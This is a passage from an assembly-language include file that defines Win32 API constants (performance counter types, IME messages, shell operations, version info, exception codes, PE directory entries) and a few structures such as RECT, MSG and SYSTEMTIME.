PERF_DELTA_COUNTER|PERF_DISPLAY_PERCENT
PERF_COUNTER_QUEUELEN_TYPE equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_QUEUELEN|
PERF_TIMER_TICK|PERF_DELTA_COUNTER|PERF_DISPLAY_NO_SUFFIX
PERF_COUNTER_BULK_COUNT equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|
PERF_TIMER_TICK|PERF_DELTA_COUNTER|PERF_DISPLAY_PER_SEC
PERF_COUNTER_TEXT equ PERF_SIZE_VARIABLE_LEN|PERF_TYPE_TEXT|PERF_TEXT_UNICODE|
PERF_DISPLAY_NO_SUFFIX
PERF_COUNTER_RAWCOUNT equ PERF_SIZE_DWORD|PERF_TYPE_NUMBER|PERF_NUMBER_DECIMAL|
PERF_DISPLAY_NO_SUFFIX
PERF_SAMPLE_FRACTION equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_FRACTION|
PERF_DELTA_COUNTER|PERF_DELTA_BASE|PERF_DISPLAY_PERCENT
PERF_SAMPLE_COUNTER equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_TICK|
PERF_DELTA_COUNTER|PERF_DISPLAY_NO_SUFFIX
PERF_COUNTER_NODATA equ PERF_SIZE_ZERO|PERF_DISPLAY_NOSHOW
PERF_COUNTER_TIMER_INV equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|
PERF_TIMER_TICK|PERF_DELTA_COUNTER|PERF_INVERSE_COUNTER|PERF_DISPLAY_PERCENT
PERF_SAMPLE_BASE equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_BASE|PERF_DISPLAY_NOSHOW|
1h
PERF_AVERAGE_TIMER equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_FRACTION|
PERF_DISPLAY_SECONDS
PERF_AVERAGE_BASE equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_BASE|PERF_DISPLAY_NOSHOW
|2h
PERF_AVERAGE_BULK equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_FRACTION|
PERF_DISPLAY_NOSHOW
PERF_100NSEC_TIMER equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|PERF_TIMER_100NS|
PERF_DELTA_COUNTER|PERF_DISPLAY_PERCENT
PERF_100NSEC_TIMER_INV equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|
PERF_TIMER_100NS|PERF_DELTA_COUNTER|PERF_INVERSE_COUNTER|PERF_DISPLAY_PERCENT
PERF_COUNTER_MULTI_TIMER equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|
PERF_DELTA_COUNTER|PERF_TIMER_TICK|PERF_MULTI_COUNTER|PERF_DISPLAY_PERCENT
PERF_COUNTER_MULTI_TIMER_INV equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_RATE|
PERF_DELTA_COUNTER|PERF_MULTI_COUNTER|PERF_TIMER_TICK|PERF_INVERSE_COUNTER|
PERF_DISPLAY_PERCENT
PERF_COUNTER_MULTI_BASE equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_BASE|
PERF_MULTI_COUNTER|PERF_DISPLAY_NOSHOW
PERF_100NSEC_MULTI_TIMER equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_DELTA_COUNTER|
PERF_COUNTER_RATE|PERF_TIMER_100NS|PERF_MULTI_COUNTER|PERF_DISPLAY_PERCENT
PERF_100NSEC_MULTI_TIMER_INV equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_DELTA_COUNTER|
PERF_COUNTER_RATE|PERF_TIMER_100NS|PERF_MULTI_COUNTER|PERF_INVERSE_COUNTER|
PERF_DISPLAY_PERCENT
PERF_RAW_FRACTION equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_FRACTION|
PERF_DISPLAY_PERCENT
PERF_RAW_BASE equ PERF_SIZE_DWORD|PERF_TYPE_COUNTER|PERF_COUNTER_BASE|PERF_DISPLAY_NOSHOW|3h
PERF_ELAPSED_TIME equ PERF_SIZE_LARGE|PERF_TYPE_COUNTER|PERF_COUNTER_ELAPSED|
PERF_OBJECT_TIMER|PERF_DISPLAY_SECONDS
PERF_COUNTER_HISTOGRAM_TYPE equ 80000000h
PERF_DETAIL_NOVICE equ 100
PERF_DETAIL_ADVANCED equ 200
PERF_DETAIL_EXPERT equ 300
PERF_DETAIL_WIZARD equ 400
PERF_NO_UNIQUE_ID equ -1
LZERROR_BADINHANDLE equ -1
LZERROR_BADOUTHANDLE equ -2
LZERROR_READ equ -3
LZERROR_WRITE equ -4
LZERROR_PUBLICLOC equ -5
LZERROR_GLOBLOCK equ -6
LZERROR_BADVALUE equ -7
LZERROR_UNKNOWNALG equ -8
VK_PROCESSKEY equ 0E5h
STYLE_DESCRIPTION_SIZE equ 32
WM_CONVERTREQUESTEX equ 108h
WM_IME_STARTCOMPOSITION equ 10Dh
WM_IME_ENDCOMPOSITION equ 10Eh
WM_IME_COMPOSITION equ 10Fh
WM_IME_KEYLAST equ 10Fh
WM_IME_SETCONTEXT equ 281h
WM_IME_NOTIFY equ 282h
WM_IME_CONTROL equ 283h
WM_IME_COMPOSITIONFULL equ 284h
WM_IME_SELECT equ 285h
WM_IME_CHAR equ 286h
WM_IME_KEYDOWN equ 290h
WM_IME_KEYUP equ 291h
IMC_GETCANDIDATEPOS equ 7h
IMC_SETCANDIDATEPOS equ 8h
IMC_GETCOMPOSITIONFONT equ 9h
IMC_SETCOMPOSITIONFONT equ 0Ah
IMC_GETCOMPOSITIONWINDOW equ 0Bh
IMC_SETCOMPOSITIONWINDOW equ 0Ch
IMC_GETSTATUSWINDOWPOS equ 0Fh
IMC_SETSTATUSWINDOWPOS equ 10h
IMC_CLOSESTATUSWINDOW equ 21h
IMC_OPENSTATUSWINDOW equ 22h
NI_OPENCANDIDATE equ 10h
NI_CLOSECANDIDATE equ 11h
NI_SELECTCANDIDATESTR equ 12h
NI_CHANGECANDIDATELIST equ 13h
NI_FINALIZECONVERSIONRESULT equ 14h
NI_COMPOSITIONSTR equ 15h
NI_SETCANDIDATE_PAGESTART equ 16h
NI_SETCANDIDATE_PAGESIZE equ 17h
ISC_SHOWUICANDIDATEWINDOW equ 1h
ISC_SHOWUICOMPOSITIONWINDOW equ 80000000h
ISC_SHOWUIGUIDELINE equ 40000000h
ISC_SHOWUIALLCANDIDATEWINDOW equ 0Fh
ISC_SHOWUIALL equ 0C000000Fh
CPS_COMPLETE equ 1h
CPS_CONVERT equ 2h
CPS_REVERT equ 3h
CPS_CANCEL equ 4h
IME_CHOTKEY_IME_NONIME_TOGGLE equ 10h
IME_CHOTKEY_SHAPE_TOGGLE equ 11h
IME_CHOTKEY_SYMBOL_TOGGLE equ 12h
IME_JHOTKEY_CLOSE_OPEN equ 30h
IME_KHOTKEY_SHAPE_TOGGLE equ 50h
IME_KHOTKEY_HANJACONVERT equ 51h
IME_KHOTKEY_ENGLISH equ 52h
IME_THOTKEY_IME_NONIME_TOGGLE equ 70h
IME_THOTKEY_SHAPE_TOGGLE equ 71h
IME_THOTKEY_SYMBOL_TOGGLE equ 72h
IME_HOTKEY_DSWITCH_FIRST equ 100h
IME_HOTKEY_DSWITCH_LAST equ 11Fh
IME_ITHOTKEY_RESEND_RESULTSTR equ 200h
IME_ITHOTKEY_PREVIOUS_COMPOSITION equ 201h
IME_ITHOTKEY_UISTYLE_TOGGLE equ 202h
GCS_COMPREADSTR equ 1h
GCS_COMPREADATTR equ 2h
GCS_COMPREADCLAUSE equ 4h
GCS_COMPSTR equ 8h
GCS_COMPATTR equ 10h
GCS_COMPCLAUSE equ 20h
GCS_CURSORPOS equ 80h
GCS_DELTASTART equ 100h
GCS_RESULTREADSTR equ 200h
GCS_RESULTREADCLAUSE equ 400h
GCS_RESULTSTR equ 800h
GCS_RESULTCLAUSE equ 1000h
CS_INSERTCHAR equ 2000h
CS_NOMOVECARET equ 4000h
IME_PROP_AT_CARET equ 10000h
IME_PROP_SPECIAL_UI equ 20000h
IME_PROP_CANDLIST_START_FROM_1 equ 40000h
IME_PROP_UNICODE equ 80000h
UI_CAP_2700 equ 1h
UI_CAP_ROT90 equ 2h
UI_CAP_ROTANY equ 4h
SCS_CAP_COMPSTR equ 1h
SCS_CAP_MAKEREAD equ 2h
SELECT_CAP_CONVERSION equ 1h
SELECT_CAP_SENTENCE equ 2h
GGL_LEVEL equ 1h
GGL_INDEX equ 2h
GGL_STRING equ 3h
GGL_PRIVATE equ 4h
GL_LEVEL_NOGUIDELINE equ 0h
GL_LEVEL_FATAL equ 1h
GL_LEVEL_ERROR equ 2h
GL_LEVEL_WARNING equ 3h
GL_LEVEL_INFORMATION equ 4h
GL_ID_UNKNOWN equ 0h
GL_ID_NOMODULE equ 1h
GL_ID_NODICTIONARY equ 10h
GL_ID_CANNOTSAVE equ 11h
GL_ID_NOCONVERT equ 20h
GL_ID_TYPINGERROR equ 21h
GL_ID_TOOMANYSTROKE equ 22h
GL_ID_READINGCONFLICT equ 23h
GL_ID_INPUTREADING equ 24h
GL_ID_INPUTRADICAL equ 25h
GL_ID_INPUTCODE equ 26h
GL_ID_INPUTSYMBOL equ 27h
GL_ID_CHOOSECANDIDATE equ 28h
GL_ID_REVERSECONVERSION equ 29h
GL_ID_PRIVATE_FIRST equ 8000h
GL_ID_PRIVATE_LAST equ 0FFFFh
IGP_PROPERTY equ 4h
IGP_CONVERSION equ 8h
IGP_SENTENCE equ 0Ch
IGP_UI equ 10h
IGP_SETCOMPSTR equ 14h
IGP_SELECT equ 18h
SCS_SETSTR equ GCS_COMPREADSTR|GCS_COMPSTR
SCS_CHANGEATTR equ GCS_COMPREADATTR|GCS_COMPATTR
SCS_CHANGECLAUSE equ GCS_COMPREADCLAUSE|GCS_COMPCLAUSE
ATTR_INPUT equ 0h
ATTR_TARGET_CONVERTED equ 1h
ATTR_CONVERTED equ 2h
ATTR_TARGET_NOTCONVERTED equ 3h
ATTR_INPUT_ERROR equ 4h
CFS_DEFAULT equ 0h
CFS_RECT equ 1h
CFS_POINT equ 2h
CFS_SCREEN equ 4h
CFS_FORCE_POSITION equ 20h
CFS_CANDIDATEPOS equ 40h
CFS_EXCLUDE equ 80h
GCL_CONVERSION equ 1h
GCL_REVERSECONVERSION equ 2h
GCL_REVERSE_LENGTH equ 3h
IME_CMODE_ALPHANUMERIC equ 0h
IME_CMODE_NATIVE equ 1h
IME_CMODE_CHINESE equ IME_CMODE_NATIVE
IME_CMODE_HANGEUL equ IME_CMODE_NATIVE
IME_CMODE_JAPANESE equ IME_CMODE_NATIVE
IME_CMODE_KATAKANA equ 2h
IME_CMODE_LANGUAGE equ 3h
IME_CMODE_FULLSHAPE equ 8h
IME_CMODE_ROMAN equ 10h
IME_CMODE_CHARCODE equ 20h
IME_CMODE_HANJACONVERT equ 40h
IME_CMODE_SOFTKBD equ 80h
IME_CMODE_NOCONVERSION equ 100h
IME_CMODE_EUDC equ 200h
IME_CMODE_SYMBOL equ 400h
IME_SMODE_NONE equ 0h
IME_SMODE_PLAURALCLAUSE equ 1h
IME_SMODE_SINGLECONVERT equ 2h
IME_SMODE_AUTOMATIC equ 4h
IME_SMODE_PHRASEPREDICT equ 8h
IME_CAND_UNKNOWN equ 0h
IME_CAND_READ equ 1h
IME_CAND_CODE equ 2h
IME_CAND_MEANING equ 3h
IME_CAND_RADICAL equ 4h
IME_CAND_STROKE equ 5h
IMN_CLOSESTATUSWINDOW equ 1h
IMN_OPENSTATUSWINDOW equ 2h
IMN_CHANGECANDIDATE equ 3h
IMN_CLOSECANDIDATE equ 4h
IMN_OPENCANDIDATE equ 5h
IMN_SETCONVERSIONMODE equ 6h
IMN_SETSENTENCEMODE equ 7h
IMN_SETOPENSTATUS equ 8h
IMN_SETCANDIDATEPOS equ 9h
IMN_SETCOMPOSITIONFONT equ 0Ah
IMN_SETCOMPOSITIONWINDOW equ 0Bh
IMN_SETSTATUSWINDOWPOS equ 0Ch
IMN_GUIDELINE equ 0Dh
IMN_PRIVATE equ 0Eh
IMM_ERROR_NODATA equ -1
IMM_ERROR_GENERAL equ -2
IME_CONFIG_GENERAL equ 1
IME_CONFIG_REGISTERWORD equ 2
IME_CONFIG_SELECTDICTIONARY equ 3
IME_ESC_QUERY_SUPPORT equ 3h
IME_ESC_RESERVED_FIRST equ 4h
IME_ESC_RESERVED_LAST equ 7FFh
IME_ESC_PRIVATE_FIRST equ 800h
IME_ESC_PRIVATE_LAST equ 0FFFh
IME_ESC_SEQUENCE_TO_INTERNAL equ 1001h
IME_ESC_GET_EUDC_DICTIONARY equ 1003h
IME_ESC_SET_EUDC_DICTIONARY equ 1004h
IME_ESC_MAX_KEY equ 1005h
IME_ESC_IME_NAME equ 1006h
IME_ESC_SYNC_HOTKEY equ 1007h
IME_ESC_HANJA_MODE equ 1008h
IME_REGWORD_STYLE_EUDC equ 1h
IME_REGWORD_STYLE_USER_FIRST equ 80000000h
IME_REGWORD_STYLE_USER_LAST equ 0FFFFh
SOFTKEYBOARD_TYPE_T1 equ 1h
SOFTKEYBOARD_TYPE_C1 equ 2h
DIALOPTION_BILLING equ 40h
DIALOPTION_QUIET equ 80h
DIALOPTION_DIALTONE equ 100h
MDMVOLFLAG_LOW equ 1h
MDMVOLFLAG_MEDIUM equ 2h
MDMVOLFLAG_HIGH equ 4h
MDMVOL_LOW equ 0h
MDMVOL_MEDIUM equ 1h
MDMVOL_HIGH equ 2h
MDMSPKRFLAG_OFF equ 1h
MDMSPKRFLAG_DIAL equ 2h
MDMSPKRFLAG_ON equ 4h
MDMSPKRFLAG_CALLSETUP equ 8h
MDMSPKR_OFF equ 0h
MDMSPKR_DIAL equ 1h
MDMSPKR_ON equ 2h
MDMSPKR_CALLSETUP equ 3h
MDM_COMPRESSION equ 1h
MDM_ERROR_CONTROL equ 2h
MDM_FORCED_EC equ 4h
MDM_CELLULAR equ 8h
MDM_FLOWCONTROL_HARD equ 10h
MDM_FLOWCONTROL_SOFT equ 20h
MDM_CCITT_OVERRIDE equ 40h
MDM_SPEED_ADJUST equ 80h
MDM_TONE_DIAL equ 100h
MDM_BLIND_DIAL equ 200h
MDM_V23_OVERRIDE equ 400h
ABM_NEW equ 0h
ABM_REMOVE equ 1h
ABM_QUERYPOS equ 2h
ABM_SETPOS equ 3h
ABM_GETSTATE equ 4h
ABM_GETTASKBARPOS equ 5h
ABM_ACTIVATE equ 6h
ABM_GETAUTOHIDEBAR equ 7h
ABM_SETAUTOHIDEBAR equ 8h
ABM_WINDOWPOSCHANGED equ 9h
ABN_STATECHANGE equ 0h
ABN_POSCHANGED equ 1h
ABN_FULLSCREENAPP equ 2h
ABN_WINDOWARRANGE equ 3h
ABS_AUTOHIDE equ 1h
ABS_ALWAYSONTOP equ 2h
ABE_LEFT equ 0
ABE_TOP equ 1
ABE_RIGHT equ 2
ABE_BOTTOM equ 3
EIRESID equ -1
FO_MOVE equ 1h
FO_COPY equ 2h
FO_DELETE equ 3h
FO_RENAME equ 4h
FOF_MULTIDESTFILES equ 1h
FOF_CONFIRMMOUSE equ 2h
FOF_SILENT equ 4h
FOF_RENAMEONCOLLISION equ 8h
FOF_NOCONFIRMATION equ 10h
FOF_WANTMAPPINGHANDLE equ 20h
FOF_ALLOWUNDO equ 40h
FOF_FILESONLY equ 80h
FOF_SIMPLEPROGRESS equ 100h
FOF_NOCONFIRMMKDIR equ 200h
PO_DELETE equ 13h
PO_RENAME equ 14h
PO_PORTCHANGE equ 20h
PO_REN_PORT equ 34h
SE_ERR_FNF equ 2
SE_ERR_PNF equ 3
SE_ERR_ACCESSDENIED equ 5
SE_ERR_OOM equ 8
SE_ERR_DLLNOTFOUND equ 32
SEE_MASK_CLASSNAME equ 1h
SEE_MASK_CLASSKEY equ 3h
SEE_MASK_IDLIST equ 4h
SEE_MASK_INVOKEIDLIST equ 0Ch
SEE_MASK_ICON equ 10h
SEE_MASK_HOTKEY equ 20h
SEE_MASK_NOCLOSEPROCESS equ 40h
SEE_MASK_CONNECTNETDRV equ 80h
SEE_MASK_FLAG_DDEWAIT equ 100h
SEE_MASK_DOENVSUBST equ 200h
SEE_MASK_FLAG_NO_UI equ 400h
NIM_ADD equ 0h
NIM_MODIFY equ 1h
NIM_DELETE equ 2h
NIF_MESSAGE equ 1h
NIF_ICON equ 2h
NIF_TIP equ 4h
SHGFI_ICON equ 100h
SHGFI_DISPLAYNAME equ 200h
SHGFI_TYPENAME equ 400h
SHGFI_ATTRIBUTES equ 800h
SHGFI_ICONLOCATION equ 1000h
SHGFI_EXETYPE equ 2000h
SHGFI_SYSICONINDEX equ 4000h
SHGFI_LINKOVERLAY equ 8000h
SHGFI_SELECTED equ 10000h
SHGFI_LARGEICON equ 0h
SHGFI_SMALLICON equ 1h
SHGFI_OPENICON equ 2h
SHGFI_SHELLICONSIZE equ 4h
SHGFI_PIDL equ 8h
SHGFI_USEFILEATTRIBUTES equ 10h
SHGNLI_PIDL equ 1h
SHGNLI_PREFIXNAME equ 2h
VS_VERSION_INFO equ 1
VS_USER_DEFINED equ 100
VS_FFI_SIGNATURE equ 0FEEF04BDh
VS_FFI_STRUCVERSION equ 10000h
VS_FFI_FILEFLAGSMASK equ 3Fh
VS_FF_DEBUG equ 1h
VS_FF_PRERELEASE equ 2h
VS_FF_PATCHED equ 4h
VS_FF_PRIVATEBUILD equ 8h
VS_FF_INFOINFERRED equ 10h
VS_FF_SPECIALBUILD equ 20h
VOS_UNKNOWN equ 0h
VOS_DOS equ 10000h
VOS_OS216 equ 20000h
VOS_OS232 equ 30000h
VOS_NT equ 40000h
VOS__BASE equ 0h
VOS__WINDOWS16 equ 1h
VOS__PM16 equ 2h
VOS__PM32 equ 3h
VOS__WINDOWS32 equ 4h
VOS_DOS_WINDOWS16 equ 10001h
VOS_DOS_WINDOWS32 equ 10004h
VOS_OS216_PM16 equ 20002h
VOS_OS232_PM32 equ 30003h
VOS_NT_WINDOWS32 equ 40004h
VFT_UNKNOWN equ 0h
VFT_APP equ 1h
VFT_DLL equ 2h
VFT_DRV equ 3h
VFT_FONT equ 4h
VFT_VXD equ 5h
VFT_STATIC_LIB equ 7h
VFT2_UNKNOWN equ 0h
VFT2_DRV_PRINTER equ 1h
VFT2_DRV_KEYBOARD equ 2h
VFT2_DRV_LANGUAGE equ 3h
VFT2_DRV_DISPLAY equ 4h
VFT2_DRV_MOUSE equ 5h
VFT2_DRV_NETWORK equ 6h
VFT2_DRV_SYSTEM equ 7h
VFT2_DRV_INSTALLABLE equ 8h
VFT2_DRV_SOUND equ 9h
VFT2_DRV_COMM equ 0Ah
VFT2_DRV_INPUTMETHOD equ 0Bh
VFT2_FONT_RASTER equ 1h
VFT2_FONT_VECTOR equ 2h
VFT2_FONT_TRUETYPE equ 3h
VFFF_ISSHAREDFILE equ 1h
VFF_CURNEDEST equ 1h
VFF_FILEINUSE equ 2h
VFF_BUFFTOOSMALL equ 4h
VIFF_FORCEINSTALL equ 1h
VIFF_DONTDELETEOLD equ 2h
VIF_TEMPFILE equ 1h
VIF_MISMATCH equ 2h
VIF_SRCOLD equ 4h
VIF_DIFFLANG equ 8h
VIF_DIFFCODEPG equ 10h
VIF_DIFFTYPE equ 20h
VIF_WRITEPROT equ 40h
VIF_FILEINUSE equ 80h
VIF_OUTOFSPACE equ 100h
VIF_ACCESSVIOLATION equ 200h
VIF_SHARINGVIOLATION equ 400h
VIF_CANNOTCREATE equ 800h
VIF_CANNOTDELETE equ 1000h
VIF_CANNOTRENAME equ 2000h
VIF_CANNOTDELETECUR equ 4000h
VIF_OUTOFMEMORY equ 8000h
VIF_CANNOTREADSRC equ 10000h
VIF_CANNOTREADDST equ 20000h
VIF_BUFFTOOSMALL equ 40000h
PROCESS_HEAP_REGION equ 1h
PROCESS_HEAP_UNCOMMITTED_RANGE equ 2h
PROCESS_HEAP_ENTRY_BUSY equ 4h
PROCESS_HEAP_ENTRY_MOVEABLE equ 10h
PROCESS_HEAP_ENTRY_DDESHARE equ 20h
SCS_32BIT_BINARY equ 0
SCS_DOS_BINARY equ 1
SCS_WOW_BINARY equ 2
SCS_PIF_BINARY equ 3
SCS_POSIX_BINARY equ 4
SCS_OS216_BINARY equ 5
LOGON32_LOGON_INTERACTIVE equ 2
LOGON32_LOGON_BATCH equ 4
LOGON32_LOGON_SERVICE equ 5
LOGON32_PROVIDER_DEFAULT equ 0
LOGON32_PROVIDER_WINNT35 equ 1
VER_PLATFORM_WIN32s equ 0
VER_PLATFORM_WIN32_WINDOWS equ 1
VER_PLATFORM_WIN32_NT equ 2
AC_LINE_OFFLINE equ 0h
AC_LINE_ONLINE equ 1h
AC_LINE_BACKUP_POWER equ 2h
AC_LINE_UNKNOWN equ 0FFh
BATTERY_FLAG_HIGH equ 1h
BATTERY_FLAG_LOW equ 2h
BATTERY_FLAG_CRITICAL equ 4h
BATTERY_FLAG_CHARGING equ 8h
BATTERY_FLAG_NO_BATTERY equ 80h
BATTERY_FLAG_UNKNOWN equ 0FFh
BATTERY_PERCENTAGE_UNKNOWN equ 0FFh
BATTERY_LIFE_UNKNOWN equ 0FFFFh
CDM_FIRST equ WM_USER+100
CDM_LAST equ WM_USER+200
CDM_GETSPEC equ CDM_FIRST+0h
CDM_GETFILEPATH equ CDM_FIRST+1h
CDM_GETFOLDERPATH equ CDM_FIRST+2h
CDM_GETFOLDERIDLIST equ CDM_FIRST+3h
CDM_SETCONTROLTEXT equ CDM_FIRST+4h
CDM_HIDECONTROL equ CDM_FIRST+5h
CDM_SETDEFEXT equ CDM_FIRST+6h
SIMULATED_FONTTYPE equ 8000h
PRINTER_FONTTYPE equ 4000h
SCREEN_FONTTYPE equ 2000h
BOLD_FONTTYPE equ 100h
ITALIC_FONTTYPE equ 200h
REGULAR_FONTTYPE equ 400h
WM_PSD_PAGESETUPDLG equ WM_USER
WM_PSD_FULLPAGERECT equ WM_USER+1
WM_PSD_MINMARGINRECT equ WM_USER+2
WM_PSD_MARGINRECT equ WM_USER+3
WM_PSD_GREEKTEXTRECT equ WM_USER+4
WM_PSD_ENVSTAMPRECT equ WM_USER+5
WM_PSD_YAFULLPAGERECT equ WM_USER+6
PSD_DEFAULTMINMARGINS equ 0h
PSD_INWININIINTLMEASURE equ 0h
PSD_MINMARGINS equ 1h
PSD_MARGINS equ 2h
PSD_INTHOUSANDTHSOFINCHES equ 4h
PSD_INHUNDREDTHSOFMILLIMETERS equ 8h
PSD_DISABLEMARGINS equ 10h
PSD_DISABLEPRINTER equ 20h
PSD_NOWARNING equ 80h
PSD_DISABLEORIENTATION equ 100h
PSD_RETURNDEFAULT equ 400h
PSD_DISABLEPAPER equ 200h
PSD_SHOWHELP equ 800h
PSD_ENABLEPAGESETUPHOOK equ 2000h
PSD_ENABLEPAGESETUPTEMPLATE equ 8000h
PSD_ENABLEPAGESETUPTEMPLATEHANDLE equ 20000h
PSD_ENABLEPAGEPAINTHOOK equ 40000h
PSD_DISABLEPAGEPAINTING equ 80000h
NM_FIRST equ 0-0
NM_LAST equ 0-99
DBG_CONTINUE equ 00010002h
DBG_TERMINATE_THREAD equ 40010003h
DBG_TERMINATE_PROCESS equ 40010004h
DBG_CONTROL_C equ 40010005h
DBG_CONTROL_BREAK equ 40010008h
DBG_EXCEPTION_NOT_HANDLED equ 80010001h
SIZE_OF_80387_REGISTERS equ 80
STATUS_WAIT_0 equ 00000000h
STATUS_ABANDONED_WAIT_0 equ 00000080h
STATUS_USER_APC equ 000000C0h
STATUS_TIMEOUT equ 00000102h
STATUS_PENDING equ 00000103h
STATUS_DATATYPE_MISALIGNMENT equ 80000002h
STATUS_BREAKPOINT equ 80000003h
STATUS_SINGLE_STEP equ 80000004h
STATUS_ACCESS_VIOLATION equ 0C0000005h
STATUS_IN_PAGE_ERROR equ 0C0000006h
STATUS_NO_MEMORY equ 0C0000017h
STATUS_ILLEGAL_INSTRUCTION equ 0C000001Dh
STATUS_NONCONTINUABLE_EXCEPTION equ 0C0000025h
STATUS_INVALID_DISPOSITION equ 0C0000026h
STATUS_ARRAY_BOUNDS_EXCEEDED equ 0C000008Ch
STATUS_FLOAT_DENORMAL_OPERAND equ 0C000008Dh
STATUS_FLOAT_DIVIDE_BY_ZERO equ 0C000008Eh
STATUS_FLOAT_INEXACT_RESULT equ 0C000008Fh
STATUS_FLOAT_INVALID_OPERATION equ 0C0000090h
STATUS_FLOAT_OVERFLOW equ 0C0000091h
STATUS_FLOAT_STACK_CHECK equ 0C0000092h
STATUS_FLOAT_UNDERFLOW equ 0C0000093h
STATUS_INTEGER_DIVIDE_BY_ZERO equ 0C0000094h
STATUS_INTEGER_OVERFLOW equ 0C0000095h
STATUS_PRIVILEGED_INSTRUCTION equ 0C0000096h
STATUS_STACK_OVERFLOW equ 0C00000FDh
STATUS_CONTROL_C_EXIT equ 0C000013Ah
EXCEPTION_CONTINUABLE equ 0
EXCEPTION_NONCONTINUABLE equ 1h
EXCEPTION_ACCESS_VIOLATION equ STATUS_ACCESS_VIOLATION
EXCEPTION_DATATYPE_MISALIGNMENT equ STATUS_DATATYPE_MISALIGNMENT
EXCEPTION_BREAKPOINT equ STATUS_BREAKPOINT
EXCEPTION_SINGLE_STEP equ STATUS_SINGLE_STEP
EXCEPTION_ARRAY_BOUNDS_EXCEEDED equ STATUS_ARRAY_BOUNDS_EXCEEDED
EXCEPTION_FLT_DENORMAL_OPERAND equ STATUS_FLOAT_DENORMAL_OPERAND
EXCEPTION_FLT_DIVIDE_BY_ZERO equ STATUS_FLOAT_DIVIDE_BY_ZERO
EXCEPTION_FLT_INEXACT_RESULT equ STATUS_FLOAT_INEXACT_RESULT
EXCEPTION_FLT_INVALID_OPERATION equ STATUS_FLOAT_INVALID_OPERATION
EXCEPTION_FLT_OVERFLOW equ STATUS_FLOAT_OVERFLOW
EXCEPTION_FLT_STACK_CHECK equ STATUS_FLOAT_STACK_CHECK
EXCEPTION_FLT_UNDERFLOW equ STATUS_FLOAT_UNDERFLOW
EXCEPTION_INT_DIVIDE_BY_ZERO equ STATUS_INTEGER_DIVIDE_BY_ZERO
EXCEPTION_INT_OVERFLOW equ STATUS_INTEGER_OVERFLOW
EXCEPTION_PRIV_INSTRUCTION equ STATUS_PRIVILEGED_INSTRUCTION
EXCEPTION_IN_PAGE_ERROR equ STATUS_IN_PAGE_ERROR
CONTEXT_i386 equ 00010000h
CONTEXT_i486 equ 00010000h
CONTEXT_CONTROL equ CONTEXT_i386|00000001h
CONTEXT_INTEGER equ CONTEXT_i386|00000002h
CONTEXT_SEGMENTS equ CONTEXT_i386|00000004h
CONTEXT_FLOATING_POINT equ CONTEXT_i386|00000008h
CONTEXT_DEBUG_REGISTERS equ CONTEXT_i386|00000010h
CONTEXT_FULL equ CONTEXT_CONTROL|CONTEXT_INTEGER|CONTEXT_SEGMENTS
IMAGE_DIRECTORY_ENTRY_EXPORT equ 0
IMAGE_DIRECTORY_ENTRY_IMPORT equ 1
IMAGE_DIRECTORY_ENTRY_RESOURCE equ 2
IMAGE_DIRECTORY_ENTRY_EXCEPTION equ 3
IMAGE_DIRECTORY_ENTRY_SECURITY equ 4
IMAGE_DIRECTORY_ENTRY_BASERELOC equ 5
IMAGE_DIRECTORY_ENTRY_DEBUG equ 6
IMAGE_DIRECTORY_ENTRY_COPYRIGHT equ 7
IMAGE_DIRECTORY_ENTRY_GLOBALPTR equ 8
IMAGE_DIRECTORY_ENTRY_TLS equ 9
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG equ 10
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT equ 11
IMAGE_DIRECTORY_ENTRY_IAT equ 12
IMAGE_NUMBEROF_DIRECTORY_ENTRIES equ 16
IMAGE_BITMAP equ 0
IMAGE_ICON equ 1
IMAGE_CURSOR equ 2
IMAGE_ENHMETAFILE equ 3
PROCESSOR_INTEL_386 equ 386
PROCESSOR_INTEL_486 equ 486
PROCESSOR_INTEL_PENTIUM equ 586
PROCESSOR_MIPS_R4000 equ 4000
PROCESSOR_ALPHA_21064 equ 21064
;-----------------------win32api structures-----------------------------
STRUC RECT
.left RESD 1
.top RESD 1
.right RESD 1
.bottom RESD 1
ENDSTRUC
STRUC POINT
.x RESD 1
.y RESD 1
ENDSTRUC
STRUC SIZEL
.x RESD 1
.y RESD 1
ENDSTRUC
STRUC MSG
.hwnd RESD 1
.message RESD 1
.wParam RESD 1
.lParam RESD 1
.time RESD 1
.pt RESB POINT_size
ENDSTRUC
STRUC SID_AND_ATTRIBUTES
.Sid RESD 1
.Attributes RESD 1
ENDSTRUC
STRUC SID_IDENTIFIER_AUTHORITY
.Value RESB 1
ENDSTRUC
STRUC OVERLAPPED
.Internal RESD 1
.InternalHigh RESD 1
.loffset RESD 1
.OffsetHigh RESD 1
.hEvent RESD 1
ENDSTRUC
STRUC SECURITY_ATTRIBUTES
.niLength RESD 1
.lpSecurityDescriptor RESD 1
.bInheritHandle RESD 1
ENDSTRUC
STRUC PROCESS_INFORMATION
.hProcess RESD 1
.hThread RESD 1
.dwProcessId RESD 1
.dwThreadId RESD 1
ENDSTRUC
STRUC FILETIME
.dwLowDateTime RESD 1
.dwHighDateTime RESD 1
ENDSTRUC
STRUC SYSTEMTIME
.wYear RESW 1
.wMonth RESW 1
.wDayOfWeek RESW 1
.wDay RESW 1
.wHour RESW 1
.wMinute RESW 1
.wSecond RESW 1
.wMilliseconds RESW 1
ENDSTRUC
STRUC COMMPROP
